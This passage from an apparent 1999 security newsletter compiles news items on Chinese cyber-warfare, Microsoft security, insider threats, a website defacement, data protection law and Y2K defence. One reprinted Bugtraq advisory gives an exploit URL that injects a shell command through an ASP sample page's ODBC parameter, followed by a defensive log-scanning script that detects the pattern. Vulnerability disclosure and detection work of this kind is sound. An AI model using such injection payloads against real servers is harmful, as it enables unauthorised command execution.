     The Liberation Army Daily (LAD), a mouthpiece of China's Peoples Liberation Army (PLA), recently called for the development
     of this capability. The paper said that, by recruiting civilian hackers and training "cyber warriors" at Army schools, China could be
     prepared for an Internet war. 

     The call was made in response to several hacking incidents in the US and China after NATO's bombing of China's Belgrade
     Embassy. The Army paper reported that a "battle" was fought on the Internet between US and Chinese hackers. 

     In May, Chinese hackers infiltrated various US government sites including the Department of Energy (DOE), the Department of the
     Interior (DOI), the US Embassy in China, and the Naval Communications Command. Nearly a thousand US civilian sites were
     broken into in the two days following the bombing, sources said. 

     According to the Chinese military paper, US hackers responded by "counterattacking" several civilian sites in China. 

     More recently, the Chinese government has been accused of waging a cyber war against the outlawed Chinese sect, Falun Gong.
     Webmasters in Canada, the US, and the UK have reported that their sites, hosting or linking to the sect's sites, were sabotaged or
     brought down by hackers traced to Chinese domains. 

     In addition to this, Beijing has moved its rhetorical campaign against the sect on to the Web. The China Internet Information Center
     and The China Daily have set up anti-Falun Gong sites.

     @HWA
     
37.0 MICROSOFT AND SECURITY (AGAIN)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From http://www.net-security.org/

     by Thejian, Tuesday 3rd August 1999 on 6:30 pm CET
     SecurityPortal has a nice analysis of Microsoft's problem with security (below). Their
     conclusion: realize MS isn't going away, but they need to be held accountable for the
     security of their products before they are released as well as after they are in
     production. The open source initiative is mentioned here as a possible way to do that
     and keep track of those problems. But then still, the Windows 9x product needs to die.
     CNET has an article on the new MS OS beta-versions, is MS learning their lesson?
     See for yourself below.        
     
     CNET:
     
     Does Microsoft's next OS point to strategy shift? 
     By Stephanie Miles
     Staff Writer, CNET News.com 
     August 3, 1999, 6:15 a.m. PT 
     URL: http://www.news.com/News/Item/0,4,40064,00.html 
     
     Microsoft's next consumer operating system will meld together bits and pieces of both Windows 98 and Windows 2000, according to those who have seen an early
     version of the release, a hodgepodge that raises questions about the company's overall strategy for its consumer platform. 
     
     Microsoft has changed its strategy for the future of consumer Windows several times in the last few years, reacting to various hardware advances, delays in the
     release of its corporate operating system, and personnel reorganizations within the company. 
     
     Currently, the official stance is this: Microsoft will release Millennium, another version of Windows 98, next year and Neptune, a consumer version of NT, in 2001 at
     the earliest. 
     
     However, the lines are not clear-cut because beta testers now report that Millennium contains elements of Windows NT, the consumerish Windows 98 and
     Windows 2000, a corporate desktop operating system coming at the end of this year. Microsoft recently released a preliminary version of the Millennium code to
     developers and hardware partners. 
     
     Although observers say these kinds of twists and turns are typical on the road to a major software release, some critics wonder if all the changes might actually be
     fueled by competitive challenges, such as the Linux operating system and America Online's popular instant messaging software. 
     
     If anything, Microsoft appears to be busy grafting. The Windows Explorer file manager appears to be comprised almost completely of Windows 2000 code and is
     identified in the operating system as being from Windows 2000, according to Chris Hilbert, Webmaster at BetaNews, a beta testing Web site, while some of the
     help files appear to be based on Windows 98, Second Edition. 
     
     "I think Millennium is just something they threw together to ooh and ahh the audience with this developer release," Hilbert said, adding that he does believe that the
     core of the operating system is based on Windows 98, as Microsoft has said. "I believe the guts, or kernel of the operating system, is still Windows 98 based,
     although a good portion of [Windows] Explorer does show signs of being Windows 2000." 
     
     Originally, last year's Windows 98 was targeted as the last release based on the DOS operating system. Future consumer operating systems were expected to be
     based on Windows 2000, a variant of Windows NT. 
     
     That strategy was then scuttled in favor of continuing the life of Windows 98 through incremental updates. Windows 98 Second Edition, released earlier this summer,
     was one such update. Millennium will be another. Windows 2000 has since been a victim of numerous delays, but is expected in corporate systems by the end of the
     year. 
     
     Microsoft product managers could not replicate any scenarios that would identify the software as anything other than Millennium, a company spokesperson said, but
     conceded that the development team may have lifted code for minor features like dialogue boxes from Windows 2000. 
     
     "There's no reason to invent whole new code--but that doesn't affect the fact that they're based on completely separate kernels," she said, explaining that using
     different code is merely a shortcut for the development team. "It shouldn't be necessary to reinvent the wheel. They can use the efforts of other groups." 
     
     But testers assert that the situation affects far more than an isolated dialogue box or two. Justin Jenkins, Webmaster of BetaLabs calls Millennium "Windows 2000
     skin over Windows 98, as far as I can tell." 
     
     It's still quite early in the development process for Millennium, and Hilbert notes that trial versions of Windows 98 contained references to Windows 95. However,
     developers and hardware partners depend on early releases of operating system software to make long-term product plans, analysts say. 

     
     
     
     www.securityportal.com
     
     Security: How big of a chink in Microsoft's armor?

 
     August 2, 1999 - This past week's news of yet another major security
     vulnerability with Microsoft's products, this time with the ODBC database driver in
     Excel 97, has led SecurityPortal.com to take a look at the big picture, and
     attempt to understand how big of a security problem Microsoft has.

     This latest security vulnerability is one of the most frightening to date, as it
     allows shell commands to be executed by opening a spreadsheet, without any
     warning whatsoever. The ODBC database driver, installed with Excel 97, supports
     a wide variety of system calls as part of its middleware approach to integrating
     applications. Among these APIs is an ability to invoke shell commands. Because
     this is ODBC, and not a macro, there is no warning imparted to the user. A user
     could download a spreadsheet, only to find that it has deleted files, made
     registry entries, or a number of other malicious acts, completely in stealth.

     Do security problems plague Microsoft because of their size, or are there other reasons? There are plenty of reasons to
     love or hate Microsoft. If you have owned Microsoft stock for the past several years, you probably love them. If you
     have tried to compete with them on any front, you probably hate them. Their penchant for consuming any technology
     or application space is well known, from dominating the word processor market to eating away at Netscape's browser
     share to attempting to co-opt Java. Microsoft has shown no fear of getting into new businesses and has experienced
     mixed results, such as with WebTV, City Sidewalk and several others. No doubt, Microsoft plays the role of the 800
     pound gorilla to perfection, and they are a magnet for publicity, both good and bad. As Microsoft aggressively pursues
     new markets and continued dominance in existing markets, are they adequately protecting the backdoor?

     Microsoft is in the crosshairs of the hackers, that is no doubt. M$, Windoze - these negative nicknames are certainly
     only there to mock Microsoft, and there do not seem to be equivalent negative terms for other companies. There is a
     fair amount of validity to Microsoft's claim that Back Orifice 2000, for example, could have been written for other
     platforms and was mostly written to embarrass Microsoft. However, we believe it is a leap of faith to claim that all of
     Microsoft's security issues are relative to the popularity of their products, and other competing products have the same
     problems.

     What are architectural differences between Microsoft operating systems and others? Windows 98 and Windows NT are
     two completely different operating systems, each with its own heritage. Windows 98 can be traced back almost to the
     origins of the company itself, as it is an iteration of MS-DOS. Windows 98 is a personal operating system. Its design
     and capabilities are to act as a single user operating system, with penultimate consideration being given to that one
     person behind the keyboard. The efforts put into Windows over the years have been to simplify the tasks of that one
     person, with considerations for the rest of the world being bolted on: network access, file sharing and of course,
     security. There is no concept of different levels of local system authority, user context versus administrative, file
     system permissions, etc. It is a completely unsophisticated core operating system that over time has been overlaid
     with a terrific set of end user features. These are major issues with the Windows 9x operating system that make it
     wholly unsuited with the security requirements of the connected world.

     Windows NT owes its existence to the fractured relationship Microsoft and IBM had over OS/2 ten years ago. Microsoft
     didn't agree with IBM that Windows did not have a future and sought to build its own "OS/2" to compete in the
     enterprise market. Microsoft wanted it to be a GUI to the core, and although it was influenced by many technologies,
     notably VMS, it was a brand new operating system. Unlike Windows 9x, it was built to be a multi-user operating system
     from the beginning. The concepts of a superuser, user, guest, contexts, inherited privileges are all in there. The Local
     Security Authority of NT authenticates and provides access based upon access control lists that extend to file
     systems, processes and any other objects defined by the system. In essence, it has a lot of the security features of
     Unix; it is simply less mature, with more security bugs yet to be exploited. This immaturity often leads to add-on
     applications not fully taking advantage of the security model and defaulting to additional services being implemented in
     an insecure manner, often by installation with administrator rights. NT is just as susceptible to application borne
     viruses as 9x, including programs like Melissa, although a virus that tries to directly access hardware or specific files
     may be constrained by the user's privileges.

     While there are stark differences in the foundation and architecture of these two operating systems, there are also
     security vulnerabilities common to both platforms, caused by other product groups within Microsoft. The effort to
     create a tight integration of its operating systems with Internet Explorer and Office has not only gotten Microsoft into
     hot water with the Department of Justice over possible antitrust violations, but has created an integrated security
     nightmare. Because of this integration, Windows 98 and NT (to a somewhat lesser degree, it depends upon the
     machine account privileges the user has) are unique among major operating systems in that a malicious hacker can
     create a program on a web site that can be opened and in one step destroy a computer. Tightly integrating
     applications with operating systems is bad for security, probably the worst thing Microsoft has done for security. In
     fact, it could be argued that Windows NT has a fairly good security model, until you start adding Microsoft applications
     on top of it. Some observations:

     The Windows 9X product needs to die, and Microsoft will need to be pushed to make this happen. There have
     been several occasions where the product end of the Windows 9X line has been predicted, even positioned by MS
     executives as a stepping stone to NT. Yet it has outlived even many internal projections within Microsoft, for the
     simple reason being that it is a cash cow. The momentum behind its huge legacy created a product that has by far
     outsold NT with lower development costs. How do you financially justify shutting something like that off? This is
     something that has been argued long and hard internally within Microsoft, to the point that you would probably be
     safer sharing a cab with an NT and Linux developer, than with an NT and Win98 developer. CIOs need to keep in mind
     that much of the future threats to their infrastructure will come from within, and there is no really safe place to use
     Windows 9x. If you need to run Windows, you need to run NT.

     Microsoft needs to make secure computing the cornerstone of the company, and the foundation of every
     product and service offering. For the end user right now, Microsoft practices "Are you sure?" security: "Are you
     sure" you want to run this macro, open that file? In fact users are often uncertain if the file they are about to open is
     going to work as advertise, or is going to wreak havoc on their system. If you look at the Security tab within Internet
     Explorer, you see different "zones" that you can define settings for: Internet, Intranet, Trusted Sites and Restricted
     Sites. Even if users could accurate index the world according to these categories, it is very crude and not very useful.
     Systems need to function under the principle of least privileges, and in a large Intranet for example, there could very
     definitely be one or two servers with malicious trojans.
     Microsoft haters need to know MS is not going away, and need to get over it. Industry giants die hard. Bill Gates
     has liked to tell the story about when he first saw kit microprocessors, he thought IBM was toast. I remember the first
     80386 processors being promoted as a mainframe on a chip and again IBM was predicted to be in deep trouble. What
     people did not realize was that as expensive as the big iron was, the investment in mainframe applications, Cobol code
     and business processes was infinitely greater. The point here is that Microsoft is not going away. Enterprises with a
     heavy investment in Microsoft desktops are not going to upgrade to Linux stations with KDE en masse any time soon.
     Linux, with its heritage as a Unix derivative, and intense scrutiny by a million developers, is a strong competitive threat
     to the same hardware markets that Microsoft sells its own operating systems. While pushing Linux strongly on the
     desktop has not been a topic many CIOs have looked at closely, it is growing strongly and in many cases displacing NT
     in the application and file server market. We at SecurityPortal.com have made it no secret that we predict a rosy
     future for Linux. It is in fact a real long term threat to Windows, but not Microsoft. It is only a matter of time before
     Microsoft releases its own Linux distribution. Microsoft is not going anywhere and needs to be part of the security
     solution.
     Microsoft needs to be held accountable for the security of their products before they are released as well as
     after they are in production. There needs to be some independent review of Microsoft's code for security
     vulnerabilities. We can think of no better way to do this than to join the Open Source initiative and in effect put its
     software in the public domain. This would be a radical departure for Microsoft, but no other single action in the
     industry could do so much to improve security.
     To get back to our original question, Security: How big of a chink in Microsoft's armor? It is a very big problem. The
     years of focus on user friendliness, leveraging operating system dominance against competitive applications and
     internal strife has built an insecure house of cards. We need to put the walls back between our applications and
     operating systems. We need third party auditing and accountability for code, possibly through Open Source initiatives
     within Microsoft. Most of all, we need every CIO to demand that Microsoft reinvent itself around security, just as it
     reinvented itself around the Internet a few years ago.
       
     @HWA
  
38.0 THE ENEMY WITHIN
     ~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/
     
     by Thejian, Tuesday 3rd August 1999 on 1:00 pm CET
     "Companies think if they buy an expensive 'firewall', they are secure because the bad
     guys are outside. In reality, the majority of the threat comes from within." Dealing
     with the fact computer hacking is often an inside job, here are some of the main
     targets of such an attack. Full story below.   
     
     AUG 3 1999 

     Computer hacking often an inside job 

     By LEONG CHAN TEIK

     THE enemy is within -- that is the harsh reality that many
     companies have yet to grasp, so say two experts on
     computer network security. 

     Mr Jeff Moss, 29, director of professional services at
     Nasdaq-listed Secure Computing Corporation, said
     yesterday: "Companies think if they buy an expensive
     'firewall', they are secure because the bad guys are
     outside. 

     "In reality, the majority of the threat comes from within." 

     He is a former hacker who now breaks into corporate
     networks only when employed by owners who want to
     find out their areas of vulnerability. 

     He told The Straits Times that at a basic level,
     employees can now easily buy software or download
     software from the Internet that allows them to read their
     colleagues' e-mail. 

     "There are many tools to do it for you. You don't need
     to know a lot of technical stuff." 

     Frequently, that is not going to hurt anyone but there will
     be occasions when the companies' systems will be under
     threat. 

     Said Mr Moss, who is conducting a seminar for some
     200 government and private-sector IT staff here today:
     "One guy learnt that he was going to be fired. He had
     the whole day to really damage the network if he wanted
     to." 

     A common weakness of networks is that they do not
     segregate, say, the engineering department from the
     accounting department. 

     This makes for an open system that is vulnerable to
     attack from all corners. 

     Mr Colin Smillie, 26, technical manager of Secure
     Computing, said a favourite target of hackers is other
     users' passwords. 

     And it is an easy target. 

     Once they have succeeded in getting the passwords,
     they can access confidential files or send e-mail. 

     He said a solution lies in a pager-like device made by his
     company which generates passwords for one-time use
     only. 

     The holder keys in his personal identification number into
     the device which will then generate the password he has
     to use the next time he logs onto the network. 

     The network is pre-programmed to accept only that
     password. 

     On the whole, Mr Moss and Mr Smillie said that
     companies should pay attention to designing systems that
     are resistant to an attack from within, which is more
     costly and complex to do. 

     They have to hire more and brighter administrators. 

     The danger is getting bigger by the day, said Mr Moss,
     who organises the yearly Def Con conventions in Las
     Vegas where law enforcement agencies such as the US
     Federal Bureau of Investigation and corporate America
     meet hackers from around the world to discuss security
     issues. 

     "You now have more temporary workers, consultants,
     contractors and business partners who are there for the
     day. The trend of more and more people sharing data
     will continue," he said.
     
     @HWA
     
39.0 DRUNKEN HACKERS ON JERRY SPRINGER
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
     From http://www.net-security.org/
     
     by Thejian, Tuesday 3rd August 1999 on 3:15 am CET
     "Drunken hackers: The women who love them and the admins who fear them." Lol,
     yes the Website of the "Jerry Springer" show got hacked yesterday by "Hacking for
     Drunks". The story is on Newsbytes, the mirror on Attrition.org 
     
     http://attrition.org/mirror/attrition/com/www.jerryspringer.com/
     
     Springer Website Hacked! On The Next Jerry Springer! 
     
     By Bob Woods, Newsbytes
     CHICAGO, ILLINOIS, U.S.A., 
     02 Aug 1999, 3:48 PM CST

     The phrase, "Drunken hackers: The women who love them and the admins who fear them," sounds like it would belong on
     the "Jerry Springer" show - or at least its accompanying Website. The phrase was indeed on the site, but no one from the
     show put it there. 

     A three-member group calling itself "Hacking for Drunks" (HFD) apparently cracked the site in recent days, putting up text
     on the site that sounds as if it were stolen from a promotional TV spot for the show. 

     The site is located at http://www.jerryspringer.com 

     "On the next Jerry Springer... Meet beercan, b33rman, and beerb0ttl3," the hacked page began. "Three young men who
     have given there (sic) up their lives to alcohol abuse and computer hacking. They have agreed to come on Jerry to tell there
     story." 

     "These three men... will introduce everyone to their world of liquor, women, and computers," the text at the site went on.
     "You will meet people whos (sic) lives they have changed, and lives they have ruined. They will tell their tale of how they
     were draged (sic) into the computer underground, where the only rules... are there (sic) own." 

     "This amazing story of lost innocence will touch you, and keep you wondering what your children are doing on the
     weekends," the text on the cracked site added. 

     As of 4:00 PM EST, the Springer site had not been restored, Newsbytes notes. 

     Officials from neither the Jerry Springer show nor the company that produces the shockfest, Studios USA, could be
     immediately reached for comment. 

     Hacking for Drunks also claimed responsibility for the recent cracking of "The Blair Witch Project" Website, at
     http://www.blairwitch.com . The Blair Witch Project is a movie that gained a large following even before its release across
     the country, due in large part to Artisan Entertainment's Internet-based marketing of the flick. 

     The message at the Blair Witch site was much simpler: "BOO~!@#$%!... d1d w3 scar3 j00?" 

     The movie - made for $60,000 in the woods of Maryland - racked up $28.5 million this past weekend, in its first weekend of
     release to 800 theaters. 

     Reported By Newsbytes.com, http://www.newsbytes.com . 

     15:48 CST
     Reposted 23:25 CST 
  
     @HWA 
  

40.0 DATA PROTECTION NOT TO BE IGNORED
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
     
     From http://www.net-security.org/
     
     by Thejian, Tuesday 3rd August 1999 on 3:00 am CET
     A London-based legal firm has warned that organizations should not ignore their legal
     requirements with regard to data protection on the Web. Alongside the EU's threat
     to take legal action against members who don't implement certain data protection
     legislation, the firm, Tarlo Lyons, warns of the legal implications of data protection
     for businesses. Story below.

      http://www.technologypost.com/ecommerce/DAILY/19990802105186419.asp?Section=Main


          Published on Monday, August 2, 1999

     E-COMMERCE 

      Data protection on Web
        should not be ignored 

     NEWSBYTES 

     Tarlo Lyons, a London-based legal firm that has been
     intricately involved with many aspects of the British
     government's information technology (IT) operations
     and legislation, has warned that organizations should not
     ignore their legal requirements with regard to data
     protection on the Web. 

     The timely warning comes as the European Union (EU)
     has threatened legal action against nine EU member
     countries for failing to implement its new data protection
     legislation. 

     According to the EU press office in Brussels, warning
     letters have now been sent to government ministers in
     France, Luxembourg, the Netherlands, Germany,
     Ireland, the UK, Denmark, Spain, and Austria. 

     The legislation, which became law on a pan-European
     basis in October of last year, goes beyond existing
     single country laws in many EU member states in giving
     citizens very broad rights as to how their personal data
     is stored by companies. 

     Back in London, meanwhile, Andrew Rigby, head of
     e-commerce and digital media with Tarlo Lyons, said
     that many businesses operating in the EU may be
     sending personal data overseas - something which
     breaches Principle 8 of the new Data Protection Act
     1998 and the European Union Directive number
     (95/46/EC) on the protection and free movement of
     personal information. 

     Despite the fact that many employees are unaware of
     the legal issues relating to transborder personal data
     transfers, Tarlo Lyons argues that the use of the Internet
     may cause breaches of the law. The legal firm says that,
     because of the use of the Internet as a means of
     advertising and communication, many global businesses
     are quite often using it both to collect personal
     information and to send it to overseas offices. 

     Despite this stark warning, Tarlo Lyons is pragmatic
     enough to say that, in general terms, exporting data is
     fine if the receiving country is in the EU territories.
     Problems, however, can occur in countries outside the
     EU and where there are no similar laws protecting
     consumers sending personal information. 

     The law firm singles out the US for clear criticism in this
     regard, which it says does not have similar laws to those
     seen in the EC. It warns that, in the absence of
     reciprocal data protection laws in the importing country,
     global businesses need to enter into inter-company
     contracts so as to avoid breaching the law. 

     The bottom line to the increasing use of the Internet for
     personal data transmissions, the law firm says, is that
     businesses operating on a global scale cannot afford the
     adverse publicity of being in breach of something as
     fundamental as privacy and confidentiality. 

     Copyright (c) Post-Newsweek Business Information, Inc.
     All rights reserved.

     @HWA
     
41.0 WIRELESS ENCRYPTION HANDHELDS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/

     by Thejian, Monday 2nd August 1999 on 11:50 pm CET
     Puma Technology is said to announce this week that it will license Certicom's Secure
     Sockets Layer (SSL) technology for its Intellisync synchronization products. This will
     allow users on both Palm and Windows CE handheld devices to be able to use strong
     data encryption over any wireless network. Full story below. 
     
     Wireless data encryption due for handhelds 

     By Ephraim Schwartz 
     InfoWorld Electric 
   
     Posted at 6:25 AM PT, Aug 2, 1999 
     Handheld devices will get a boost in security this week when Puma Technology announces that it will license Certicom's Secure Sockets Layer (SSL)
     technology for its Intellisync synchronization products. 
   
     Corporate users of messaging, calendaring, and contact databases on both Palm and Windows CE handheld devices now will be able to synchronize over
     any wireless network with so-called strong data encryption. The next version of Intellisync Anywhere, due to ship later this year, will include the Certicom
     security software. 
   
     The ability to prevent the interception of data is a step toward adoption of handheld devices in the enterprise, but more is still needed, according to IT
     consultants and industry analysts. 
   
     "The lack of security never kept handhelds from being officially supported devices," said Travis Hoxmeir, a consultant at Akila, a Portland, Ore., company
     that helped the Pacific Gas and Electric Gas Transmission agency to deploy a handheld strategy. "Within IT, security is an important issue, but users just say,
     'I want [a handheld]. Security is somebody else's problem, not mine,' " Hoxmeir said. 
   
     Though the Certicom technology will guard against midair interception of data, a bigger problem for IT is what data employees are putting on their handhelds,
     according to Ken Dulaney, vice president of mobile computing at the Gartner Group, in San Jose, Calif. 
   
     The storage of company information on personally owned handheld devices is a serious problem, Dulaney said. 
   
     "We need something from Puma, like a console, that tracks what corporate data is flowing out to these devices," Dulaney added. 
   
     Puma Technology Inc., in San Jose, Calif., can be reached at www.pumatech.com. Certicom Corp., in Hayward, Calif., can be reached at
     www.certicom.com. 
     
     @HWA
     
42.0 Y2K TO AID IN CYBERDEFENSE
     ~~~~~~~~~~~~~~~~~~~~~~~~~~  
     From http://www.net-security.org/
     
     by Thejian, Monday 2nd August 1999 on 11:30 pm CET
     The Senate last week took its first close look at how the knowledge gained and used
     to battle the Y2K problem can be used to guard now and in the future against attacks
     on the nation's infrastructure. In a testimony before the Senate Special Committee on
     the Y2K Technology Problem, federal experts said experience gained in this field
     could be used to confront infrastructure protection issues. Read more. 
     
     http://www.fcw.com/pubs/fcw/1999/0802/fcw-newssecurity-08-02-99.html
     
     AUGUST 2, 1999 


     Feds say Y2K experience aids in cyberdefense

     BY DIANE FRANK (diane_frank@fcw.com)

     The Senate last week took its first close look at how the expertise and
     systems being developed to deal with the Year 2000 problem can be used now
     and in the future against intentional attacks on the nation's infrastructure.

     Testifying before the Senate Special Committee on the Year 2000 Technology
     Problem, federal experts said experience gained by a special coordination center
     created to gather and share information on problems caused by the Year 2000
     date change could be used to confront infrastructure protection issues.
     However, the center itself may not be needed beyond next March.

     "Clearly, there will be much of value that will last beyond the [Year 2000
     Information Coordination Center]," said John Koskinen, chairman of the
     President's Council on Year 2000 Conversion. "This is in effect our first
     real-time test...and ultimately, it is a great way for all of us to learn from this
     experience."

     President Clinton recently officially created the ICC, which will gather and
     share information on incidents worldwide caused by the Year 2000 date change.
     That information then will be used by agencies, state and local governments and
     the private sector for a coordinated response. The Senate committee is
     considering expanding its mission beyond the Year 2000 problem and its life
     span beyond Feb. 29 to oversee the information security and critical
     infrastructure protection efforts at the congressional level.

     But federal officials involved in infrastructure protection issues told the
     committee that the structures already are in place in the public and private
     sectors to handle critical infrastructure protection. The officials added that the
     ICC's information sharing mechanism and the partnerships created throughout
     government and industry as part of that sharing will be key when dealing with
     any incidents in the future when someone brings down a computer system that
     controls a country's transportation, communication or energy infrastructures.

     "Our collective efforts on Y2K should provide valuable lessons learned for the
     continuing activities of the NIPC and the federal lead agencies in dealing with
     cyber incidents after Y2K," said Michael Vatis, chief of the National
     Infrastructure Protection Center at the FBI.

     It is hoped that the experience gained from fixing the Year 2000 bug will cut
     down on the time it will take to develop future responses and management to
     critical infrastructure attacks, said John Tritak, director of the Critical
     Infrastructure Assurance Office.

     The Defense Department has plenty of experience dealing with cyberprotection
     issues, but it plans to rely heavily on the structures that are being put in place
     within the department to support the ICC, said Richard Schaeffer, director of
     infrastructure and information assurance at the Office of the Assistant
     Secretary of Defense for Command, Control, Communications and Intelligence.

     Experts throughout government and industry have started to refer to the Year
     2000 problem as the first real test of protecting the critical infrastructure of the
     United States against computer system failures. Although any problems caused
     by the Year 2000 date change will be unintentional, focus is turning to the
     possible effect on the nation's infrastructure if someone deliberately attacked a
     system in an attempt to bring it down.

     Committee chairman Sen. Bob Bennett (R-Utah) and vice chairman Sen.
     Christopher Dodd (D-Conn.) also raised several possibilities for more concrete
     ways that agencies and industry can contribute, including continuing the ICC in
     the role of a critical infrastructure protection center, creating a new organization
     to oversee the coordination and even creating a "government chief information
     officer," who would be at the level of an assistant to the president. 

     The key to infrastructure protection is how fast the response time is because the
     longer the response takes, the longer you are vulnerable, said Winn Schwartau,
     information warfare author and consultant. "We need a fundamental shift in the
     way we approach security," Schwartau said. "It requires an empowerment
     much farther down the chain of command."
      
     @HWA
     
43.0 Yet Another ODBC Bugged ASP Sample Page 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
     Approved-By: aleph1@SECURITYFOCUS.COM 
     Date:         Thu, 29 Jul 1999 04:32:05 -0300 
     Reply-To: "Wanderley J. Abreu Junior" <storm@UNIKEY.COM.BR> 
     Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> 
     From: "Wanderley J. Abreu Junior" <storm@UNIKEY.COM.BR> 
     Subject:      Yet Another ODBC Bugged ASP Sample Page 
     X-To:         Microsoft Product Security Response Team <secure@microsoft.com> 
     To: BUGTRAQ@SECURITYFOCUS.COM 
     
     
     Dear Team,
     
     
                 Exploiting ODBC Features that come with your sample programs is
     not a mystery for any of us. So let me add one more ASP Sample with similar
     troubles:
     
     
                  http://server/ASPSamp/AdvWorks/equipment/catalog_type.asp
                   or yet
                  http://server/AdvWorks/equipment/catalog_type.asp
     
     
                 It lets you execute shell commands like the other scripts. It is
     an Active Server Page so it runs the query as a local user and doesn't need
     any type of Remote Data Service to access the DSN. It just requires the
     default DSN (advworks) set.
     
     
                 The Exploit command line can be for instance :
     
     
     
     http://server/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|
     
     
                 Sorry if this SERIOUS security failure was already reported.
     
     
     Regards,
     
     
                  Wanderley Junior
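
     For defenders, an added example that is not part of the original post: a scan of web
     server logs for the pipe-wrapped call pattern quoted in the report, and for sample-application
     pages that are still being served. The W3C field layout, the log lines and the reason labels
     are constructed assumptions; the two path prefixes are taken from the URLs in the post.

```python
import re
from urllib.parse import unquote_plus

# Path prefixes of the sample application named in the post (compared lower-case).
SAMPLE_PREFIXES = ("/aspsamp/", "/advworks/")

# A function call opened right after a pipe character, as in |shell("...")| from the post.
PIPE_CALL = re.compile(r"\|\s*([A-Za-z_][A-Za-z0-9_]*)\s*\(")

# Constructed W3C extended log lines (documentation addresses, not real traffic).
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-07-29 07:40:01 192.0.2.10 GET /default.asp - 200
1999-07-29 07:40:07 192.0.2.10 GET /AdvWorks/equipment/catalog_type.asp ProductType=Tents 200
1999-07-29 07:41:12 198.51.100.7 GET /AdvWorks/equipment/catalog_type.asp ProductType=|shell("cmd+/c+dir+c:\")| 200
1999-07-29 07:41:30 198.51.100.7 GET /ASPSamp/AdvWorks/equipment/catalog_type.asp ProductType=%7Cshell(%22cmd+/c+dir+c:%5C%22)%7C 500
1999-07-29 07:42:00 203.0.113.5 GET /search.asp q=a%7Cb 200
"""


def decode_layers(value, max_rounds=3):
    """URL-decode repeatedly so that %7C and %257C both surface as '|'."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def scan(text):
    """Return (client, path, reasons) for every request worth an analyst's attention."""
    findings = []
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        decoded = decode_layers(query) if query != "-" else ""
        reasons = []
        match = PIPE_CALL.search(decoded)
        if match:
            # The query string carries a pipe-wrapped function call.
            reasons.append("pipe-call:" + match.group(1).lower())
        if stem.lower().startswith(SAMPLE_PREFIXES) and rec.get("sc-status") == "200":
            # Sample content is deployed and answering on this server.
            reasons.append("sample-app-served")
        if reasons:
            findings.append((rec.get("c-ip", "?"), stem, reasons))
    return findings


if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE_LOG):
        print(client, path, ",".join(reasons))
```

     A bare pipe in a parameter (the last constructed line) is not flagged; only a pipe followed
     by a call is, which keeps ordinary search queries out of the results.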
             
     @HWA             
     
44.0 New security mailing lists available from Security Focus
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Thu Aug 05 1999

     Security Focus is now offering 3 new mailing lists. Bugtraq Spanish, Bugtraq Japanese & Security Focus News.
     
     Security Focus is now offering 3 new mailing lists. The first two are BUGTRAQ-JP (Japanese) and BUGTRAQ-ES (Spanish). The first one will
     be moderated by Nobuo Miwa and the second one by Hernan Ochoa. The third is SF-NEWS.
     
     Here is the charter of the first two new lists:
     
     BUGTRAQ-[JP,ES] is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security
     vulnerabilities: what they are, how to exploit them, and how to fix them.
     
     The mailing list language is [Japanese|Spanish].
     
     The mailing list is an offshoot of the BUGTRAQ mailing list. It was specifically created to allow people not comfortable with the English
     language that speak [Japanese|Spanish] to have access to the same high-quality information as in BUGTRAQ.
     
     If you do feel comfortable understanding English we recommend you instead subscribe to BUGTRAQ. You can do so by sending email to
     LISTSERV@SECURITYFOCUS.COM with a message body of:
     
     SUBS BUGTRAQ First-name Last-name
     
     The moderator(s) of the list will make sure that any interesting discussion in BUGTRAQ is summarized, translated and posted to this list at
     least once a week. Similarly any new information covered on this list that has not already been discussed in BUGTRAQ will be translated and
     forwarded to it by the moderator(s).
     
     To see the full charter of each list in its native language visit securityfocus.com and look under Forums.
     
     The third new list is SF-NEWS. SF-NEWS is the Security Focus weekly summary mailing list. Of interest to BUGTRAQ readers is the
     inclusion of a summary list of vulnerabilities posted to BUGTRAQ and elsewhere. So if you are overwhelmed by the traffic in BUGTRAQ this
     may be the one for you.
     
     Other things covered include a summary of incidents reported in the INCIDENTS lists, a summary list of positions being offered or resumes
     being tendered as posted to the Security Jobs list, results from the weekly polls and Security Focus announcements.
     
     To subscribe to any of these lists email LISTSERV@SECURITYFOCUS.COM with a message body of:
     
     SUBS BUGTRAQ-JP First-name Last-name
     
     or
     
     SUBS BUGTRAQ-ES First-name Last-name
     
     or
     
     SUBS SF-NEWS First-name Last-name     
     
     
     @HWA
     
45.0 Beyond Virtual Vaccinations
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.sciencenews.org/sn_arc99/7_31_99/bob2.htm
     
     (See url for graphics and charts, omitted from this textfile)
     
     Beyond Virtual Vaccinations  

     Developing a digital immune system in bits and bytes
     
     By Damaris Christensen
     
     The fear of new, dangerous viruses sweeping through an unprotected population is not limited to public health officials.
     Computer researchers have long worried because typical virus-scanning computer programs -- which essentially vaccinate
     machines against known viruses -- become outdated as newly created viruses spread over the Internet. 
     
     Just as researchers turned to biology in applying the name virus to the pesky programs that could make computers sick,
     several groups have turned to biology for a new model of how to protect computers against unknown viruses. They are focusing
     on the human immune system.
     
     These computer scientists hope to develop a digital system that, like the immune system, can quickly recognize and fight off
     known infections, identify new intruders and learn how to deter them, and remember all previously encountered pathogens.
